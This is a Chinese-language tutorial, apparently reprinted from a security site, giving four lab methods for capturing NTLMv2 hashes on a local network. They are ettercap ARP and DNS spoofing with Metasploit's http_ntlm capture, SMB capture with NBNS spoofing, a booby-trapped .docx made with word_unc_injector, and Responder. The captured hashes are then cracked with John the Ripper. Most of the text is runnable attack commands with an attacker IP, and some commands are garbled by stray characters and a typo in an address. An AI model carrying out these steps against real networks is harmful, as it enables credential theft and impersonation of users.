標籤:

實用教程:從網路中獲取NTLM Hash的四種方法

大家好,今天我給大家展示下如何在本地網路中捕獲到NTLM Hash,本文我就為大家介紹四種不同的方法。開始講述攻擊技術之前,我們先了解下NTLM Hash吧。

NTLM這一名詞是由以下單詞的首字母拼湊而成的:

NT:New technologies(windows的新技術)

LAN:本地區域網(Local area network)

M:管理者(Manager)

在一個windows網路中,NTLM是一套Microsoft安全協議。Windows NT 4.0操作系統中的網路身份驗證默認為用戶提供身份驗證,完整性和機密性。 NTLMv2是最新版本,並使用基於NT MD4的單向功能。哈希長度為128位,適用於本地帳戶和域帳戶。

NTLM協議使用兩個散列密碼值中的一個或兩個,這兩個值也存儲在伺服器(或域控制器)上,並且兩個hash值加的鹽都是等效的,這意味著如果從伺服器獲取哈希值,就可以在不知道實際密碼的情況下進行身份驗證。

如果還想了解更多關於NTLM的信息,可以通過wikipedia.org了解到。

那麼現在就讓我們開始試驗吧。

環境:

攻擊機:Kali Linux

靶機: Windows 10

通過嗅探捕獲NTLMv2hash值

首先在kali中的/etc/ettercap目錄下將etter.dns中的內容全部刪除,然後在裡面寫入以下格式的攻擊者IP,然後保存文檔。

* A 192.168.1.103n

接下來按照下方步驟打開ettercap,進行嗅探。

1. Application -> sniffing and spoofing > ettercapn2. 點擊Sniff然後選擇你的網卡n3. 點擊Scan for host 去生成攻擊列表n

選擇攻擊主機,添加目標,下方給出的圖片中你可以看到我選擇了192.168.1.101作為攻擊目標,並且加入到了target1中。

在菜單中點擊MITM,選擇ARP poisoning,然後在彈出的框啟用」sniff remote connects」,點擊ok。

在菜單欄中繼續點擊plugin(插件)這一選項,然後選擇dns_spoof.

通過使用dns_spoof攻擊者可以使區域網內的流量全部經過本地,那麼無論靶機通過瀏覽器訪問什麼網頁,都會重定向到攻擊者IP上面。

現在打開msf,然後執行下方代碼使用http_ntlm模塊。這一模塊可以獲取到NTLM/LM hash。

use auxiliary/server/capture/http_ntlmnmsf auxiliary(http_ntlm) > set srvhost 192.168.1.103nmsf auxiliary(http_ntlm) > set SRVPORT 80nmsf auxiliary(http_ntlm) > set URIPATH /nmsf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/nmsf auxiliary(http_ntlm) > exploitn

執行完上述的步驟,當靶機中訪問http網頁時,在msf中就會捕獲到靶機系統的NTLM密碼。

在下方圖片中你可以觀察到靶機正在嘗試訪問」hackingarticles.in」這一網站,但是在訪問過程中跳出了要輸入賬號密碼的驗證頁面。現在他無論打開任何網址,都會跳出來這樣的驗證頁面。如果他不輸入賬號密碼,這一頁面會一直出現在他的瀏覽器中。

如果靶機輸入了他的賬號密碼,攻擊者就可以在後台捕獲到系統中的NTLM hash值。

太棒了,攻擊者已經獲取到了NTLMhash值,現在讓我們看看我們捕獲到的具體信息。

從給出的圖片中你可以看到攻擊者還獲得兩個額外的信息:

用戶名:pentest

機器名:Desktop-UKIQM20

現在執行john_netntlmv2命令通過john ripper破解ntlm2 hash。

從下圖中你可以看到已經成功的破解了之前獲得的hash值:」password:123」。

通過捕獲SMB流量以及欺騙NBNS對NTLM2 hash進行獲取

這一部分會在機器上啟動一個smb服務,用於獲得SMB客戶端系統的」挑戰/應答」協議的密碼hash。這一服務的響應是使用的默認的挑戰字元串」x11x22x33x44x55x66x77x88」,可以使用Cain,Abel,L0phtcrack或者John the ripper進行破解。為了達到這一目的,攻擊者必須嘗試對這一模塊進行驗證。

use auxiliary/server/capture/smbnmsf auxiliary(smb) > set srvhost 192.168.1.103nmsf auxiliary(smb) > set JOHNPWFILE /tmp/john_smbnmsf auxiliary(smb) > exploitn

同時在捕獲smb模塊下執行NBNS_response模塊。

這一模塊偽造NetBIOS名稱服務(NBNS)響應。他會偵聽發送到本地網卡的NBNS請求,並且返回一個偽造的響應,將正在請求的這一機器重定向到攻擊者選擇的IP。與auxiliary/server/capture/smb或者auxiliary/server/capture/http_ntlm結合,就大大提高在公眾網路中收集可破解hash的效率。這一模塊需要的是root許可權,並且綁定在所有網卡的udp/137埠上。

use auxiliary/spoof/nbns/nbns_responsenmsf auxiliary(nbns_response) > set SPOOFIP 1192.168.1.103nmsf auxiliary(nbns_response) > set INTERFACE eth0nmsf auxiliary(nbns_response) >exploitn

這一模塊會在受害者系統上生成一個假的安全提示窗口,建立與另外一個系統的連接,以便訪問該系統的共享文件夾。

我們使用nmap對本地udp以及tcp埠進行掃描,下圖中你可以發現NETBIOS對應的137埠已經開放。

現在當靶機嘗試訪問共享文件夾時,他將通過他的網路IP與攻擊者進行連接。下圖中是證明受害諍正在連接攻擊者IP:192.168.1.103的證明。

訪問到共享文件夾時,他會看到一個假的安全提示窗口,會要求受害者輸入他的用戶名和密碼進行訪問共享文件夾。

攻擊者再次獲得了NTMLv2 hash。從下圖中可以看到,攻擊者還獲得了兩個額外的信息。

用戶名:pentest

機器名:Desktop-UKIQM20

再一次使用john_netntlmv2命令對ntlmv2 hash進行破解。

通過捕獲SMB以及word UNC injector獲取NTLMv2 hash

這一模塊會修改.docx文件,一旦文件打開,他會將存儲的netNTLM憑證發送給遠程主機。它同樣可以產生一個空的docx文件。必須將這一文件打開模式為編輯模式,這樣才可以與遠程主機進行通信。預覽和只讀模式不會建立起來通信。經過確認,在word 2003,2007,2010,2013攻擊有效。

use auxiliary/docx/word_unc_injectornmsf auxiliary(word_unc_injector) >set lhost 192.168.1.103nmsf auxiliary(word_unc_injector) >exploitn

它會在/root/.msf4/local文件夾中產生一個空的word文件。

把產生的文件發送給受害者,然後像之前一樣在msf中運行smb模塊。

下圖中你可以發現auxiliary/server/capture/smb這一模塊被載入,以便獲取hash。

一旦受害者打開msf.docx文件,攻擊者那邊就會在他的系統上收到TLMv2 hash。與上述兩個方法不同的是,這一方法只是獲取到了NTLMv2Hash值,沒有其他額外的信息。

然後執行john _netntlmv2破解密碼。

Responder

Responder是一款強大並且簡單易用的內網滲透神器。由 Laurent Gaffie創建。這一工具會監聽以下埠:UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553。

現在打開一個新的命令行,執行下面命令從github下載:

git clone https://github.com/SpiderLabs/Responder.gitncd Respondern

打開文件夾然後運行python腳本:

python Responder.py –I 192.168.1.103 -I eth0n

你可以看到所有Poisoners以及服務全部打開:

現在受害者再次訪問共享文件夾,他將通過網路IP與攻擊者進行連接,下面給出的圖像顯示受害者正在連接攻擊者的IP:192.168.1.103

當受害者訪問共享文件夾時,他會得到一個假的錯誤信息,如下:

一旦攻擊者成功捕獲NTLMv2 hash值,你可以看到同樣獲得了用戶名以及機器名:

它會在/root/Desktop/Responder/logs.

然後使用john_netntlmv2進行破解,下圖顯示已經破解成功:

如若轉載,請註明原文地址: 4hou.com/system/8041.ht 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀:

只因更新固件推送出錯 Lockstate智能鎖秒變磚
亞塞拜然黑客竊取了亞美尼亞大量機密數據
某靜態頁面xss挖掘過程

TAG:信息安全 |